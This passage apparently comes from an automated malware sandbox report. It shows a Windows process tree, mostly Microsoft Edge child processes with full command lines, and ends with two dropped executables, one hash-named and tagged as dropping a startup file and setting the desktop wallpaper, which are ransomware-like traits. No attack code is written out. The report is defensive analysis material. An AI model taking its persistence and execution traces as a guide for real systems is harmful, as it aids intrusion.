        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5332,i,15997181751952981477,16731226312764483235,262144 --variations-seed-version --mojo-platform-channel-handle=5408 /prefetch:8
        6⤵
        
        PID:5692
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5340,i,15997181751952981477,16731226312764483235,262144 --variations-seed-version --mojo-platform-channel-handle=5428 /prefetch:8
        6⤵
        
        PID:2980
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=5820,i,15997181751952981477,16731226312764483235,262144 --variations-seed-version --mojo-platform-channel-handle=5828 /prefetch:1
        6⤵
        
        PID:1940
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6348,i,15997181751952981477,16731226312764483235,262144 --variations-seed-version --mojo-platform-channel-handle=6356 /prefetch:8
        6⤵
        
        PID:856
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6080,i,15997181751952981477,16731226312764483235,262144 --variations-seed-version --mojo-platform-channel-handle=5784 /prefetch:8
        6⤵
        
        PID:3796
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6008,i,15997181751952981477,16731226312764483235,262144 --variations-seed-version --mojo-platform-channel-handle=4248 /prefetch:8
        6⤵
        
        PID:452
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6028,i,15997181751952981477,16731226312764483235,262144 --variations-seed-version --mojo-platform-channel-handle=6036 /prefetch:8
        6⤵
        
        PID:2308
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=6088,i,15997181751952981477,16731226312764483235,262144 --variations-seed-version --mojo-platform-channel-handle=752 /prefetch:8
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5308
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4016,i,15997181751952981477,16731226312764483235,262144 --variations-seed-version --mojo-platform-channel-handle=4000 /prefetch:8
        6⤵
        
        PID:4928
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=1208,i,15997181751952981477,16731226312764483235,262144 --variations-seed-version --mojo-platform-channel-handle=3944 /prefetch:8
        6⤵
        
        PID:3180
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4116,i,15997181751952981477,16731226312764483235,262144 --variations-seed-version --mojo-platform-channel-handle=1016 /prefetch:8
        6⤵
        
        PID:7880
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5548,i,15997181751952981477,16731226312764483235,262144 --variations-seed-version --mojo-platform-channel-handle=3660 /prefetch:8
        6⤵
        
        PID:8360
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3928,i,15997181751952981477,16731226312764483235,262144 --variations-seed-version --mojo-platform-channel-handle=6608 /prefetch:8
        6⤵
        
        PID:10092
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
        6⤵
        Drops file in Program Files directory
        Checks processor information in registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:1288
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x268,0x7ffd1d1df208,0x7ffd1d1df214,0x7ffd1d1df220
        7⤵
        
        PID:6620
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1816,i,11888521954884467361,10836803074197993603,262144 --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:3
        7⤵
        
        PID:4408
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2068,i,11888521954884467361,10836803074197993603,262144 --variations-seed-version --mojo-platform-channel-handle=2052 /prefetch:2
        7⤵
        
        PID:8024
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1900,i,11888521954884467361,10836803074197993603,262144 --variations-seed-version --mojo-platform-channel-handle=2712 /prefetch:8
        7⤵
        
        PID:1200
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4404,i,11888521954884467361,10836803074197993603,262144 --variations-seed-version --mojo-platform-channel-handle=4428 /prefetch:8
        7⤵
        
        PID:5868
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4404,i,11888521954884467361,10836803074197993603,262144 --variations-seed-version --mojo-platform-channel-handle=4428 /prefetch:8
        7⤵
        
        PID:5196
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4596,i,11888521954884467361,10836803074197993603,262144 --variations-seed-version --mojo-platform-channel-handle=4608 /prefetch:8
        7⤵
        
        PID:5360
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4616,i,11888521954884467361,10836803074197993603,262144 --variations-seed-version --mojo-platform-channel-handle=4636 /prefetch:8
        7⤵
        
        PID:180
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4668,i,11888521954884467361,10836803074197993603,262144 --variations-seed-version --mojo-platform-channel-handle=4764 /prefetch:8
        7⤵
        
        PID:9636
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4688,i,11888521954884467361,10836803074197993603,262144 --variations-seed-version --mojo-platform-channel-handle=4716 /prefetch:8
        7⤵
        
        PID:8532
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4776,i,11888521954884467361,10836803074197993603,262144 --variations-seed-version --mojo-platform-channel-handle=4796 /prefetch:8
        7⤵
        
        PID:7024
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=564,i,11888521954884467361,10836803074197993603,262144 --variations-seed-version --mojo-platform-channel-handle=5024 /prefetch:8
        7⤵
        
        PID:9668
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4908,i,11888521954884467361,10836803074197993603,262144 --variations-seed-version --mojo-platform-channel-handle=4424 /prefetch:8
        7⤵
        
        PID:9576
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4896,i,11888521954884467361,10836803074197993603,262144 --variations-seed-version --mojo-platform-channel-handle=3200 /prefetch:8
        7⤵
        
        PID:1768
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5000,i,11888521954884467361,10836803074197993603,262144 --variations-seed-version --mojo-platform-channel-handle=4868 /prefetch:8
        7⤵
        
        PID:9632
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4904,i,11888521954884467361,10836803074197993603,262144 --variations-seed-version --mojo-platform-channel-handle=5064 /prefetch:8
        7⤵
        
        PID:9580
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4604,i,11888521954884467361,10836803074197993603,262144 --variations-seed-version --mojo-platform-channel-handle=4732 /prefetch:8
        7⤵
        
        PID:4560
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4480,i,11888521954884467361,10836803074197993603,262144 --variations-seed-version --mojo-platform-channel-handle=4636 /prefetch:8
        7⤵
        
        PID:9816
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=4936,i,11888521954884467361,10836803074197993603,262144 --variations-seed-version --mojo-platform-channel-handle=4648 /prefetch:8
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2332
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4660,i,11888521954884467361,10836803074197993603,262144 --variations-seed-version --mojo-platform-channel-handle=764 /prefetch:8
        7⤵
        
        PID:8648
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4016,i,11888521954884467361,10836803074197993603,262144 --variations-seed-version --mojo-platform-channel-handle=4116 /prefetch:8
        7⤵
        
        PID:8808
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4808,i,11888521954884467361,10836803074197993603,262144 --variations-seed-version --mojo-platform-channel-handle=4076 /prefetch:8
        7⤵
        
        PID:7736
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3932,i,11888521954884467361,10836803074197993603,262144 --variations-seed-version --mojo-platform-channel-handle=4788 /prefetch:8
        7⤵
        
        PID:8044
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4044,i,11888521954884467361,10836803074197993603,262144 --variations-seed-version --mojo-platform-channel-handle=4132 /prefetch:8
        7⤵
        
        PID:4504
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=4400,i,11888521954884467361,10836803074197993603,262144 --variations-seed-version --mojo-platform-channel-handle=5100 /prefetch:1
        7⤵
        
        PID:2728
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=4124,i,11888521954884467361,10836803074197993603,262144 --variations-seed-version --mojo-platform-channel-handle=4000 /prefetch:1
        7⤵
        
        PID:3084
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5424,i,11888521954884467361,10836803074197993603,262144 --variations-seed-version --mojo-platform-channel-handle=5460 /prefetch:8
        7⤵
        
        PID:8304
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5436,i,11888521954884467361,10836803074197993603,262144 --variations-seed-version --mojo-platform-channel-handle=5480 /prefetch:8
        7⤵
        
        PID:3088
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_xpay_wallet.mojom.EdgeXPayWalletService --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5868,i,11888521954884467361,10836803074197993603,262144 --variations-seed-version --mojo-platform-channel-handle=5896 /prefetch:8
        7⤵
        
        PID:5648
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --always-read-main-dll --field-trial-handle=5764,i,11888521954884467361,10836803074197993603,262144 --variations-seed-version --mojo-platform-channel-handle=6076 /prefetch:1
        7⤵
        
        PID:8412
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
        7⤵
        Drops file in Program Files directory
        Checks processor information in registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Modifies registry class
        
        PID:9488
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x25c,0x7ffd1d1df208,0x7ffd1d1df214,0x7ffd1d1df220
        8⤵
        
        PID:3360
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1928,i,4522254401369273500,17845118871326957756,262144 --variations-seed-version --mojo-platform-channel-handle=2252 /prefetch:3
        8⤵
        
        PID:1360
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2212,i,4522254401369273500,17845118871326957756,262144 --variations-seed-version --mojo-platform-channel-handle=2200 /prefetch:2
        8⤵
        
        PID:6480
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2520,i,4522254401369273500,17845118871326957756,262144 --variations-seed-version --mojo-platform-channel-handle=2532 /prefetch:8
        8⤵
        
        PID:3624
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4284,i,4522254401369273500,17845118871326957756,262144 --variations-seed-version --mojo-platform-channel-handle=4256 /prefetch:8
        8⤵
        
        PID:832
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4284,i,4522254401369273500,17845118871326957756,262144 --variations-seed-version --mojo-platform-channel-handle=4256 /prefetch:8
        8⤵
        
        PID:9780
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4560,i,4522254401369273500,17845118871326957756,262144 --variations-seed-version --mojo-platform-channel-handle=4636 /prefetch:8
        8⤵
        
        PID:9800
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=4688,i,4522254401369273500,17845118871326957756,262144 --variations-seed-version --mojo-platform-channel-handle=4780 /prefetch:8
        8⤵
        
        PID:6348
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4912,i,4522254401369273500,17845118871326957756,262144 --variations-seed-version --mojo-platform-channel-handle=4680 /prefetch:8
        8⤵
        
        PID:4840
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4772,i,4522254401369273500,17845118871326957756,262144 --variations-seed-version --mojo-platform-channel-handle=4200 /prefetch:8
        8⤵
        
        PID:2620
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4908,i,4522254401369273500,17845118871326957756,262144 --variations-seed-version --mojo-platform-channel-handle=1328 /prefetch:8
        8⤵
        
        PID:680
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4032,i,4522254401369273500,17845118871326957756,262144 --variations-seed-version --mojo-platform-channel-handle=4668 /prefetch:8
        8⤵
        
        PID:6560
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.9bis.net/kitty/#!pages/donation.md
    3⤵
    PID:3952
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.9bis.net/kitty/check_update.php?version=0.76.1.13
    3⤵
    PID:3504
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.9bis.net/kitty/#!pages/donation.md
    3⤵
    PID:708
- C:\Users\Admin\AppData\Roaming\AutoClicker-3.1.exe
  "C:\Users\Admin\AppData\Roaming\AutoClicker-3.1.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  PID:5004
- C:\Users\Admin\AppData\Roaming\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
  "C:\Users\Admin\AppData\Roaming\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Sets desktop wallpaper using registry
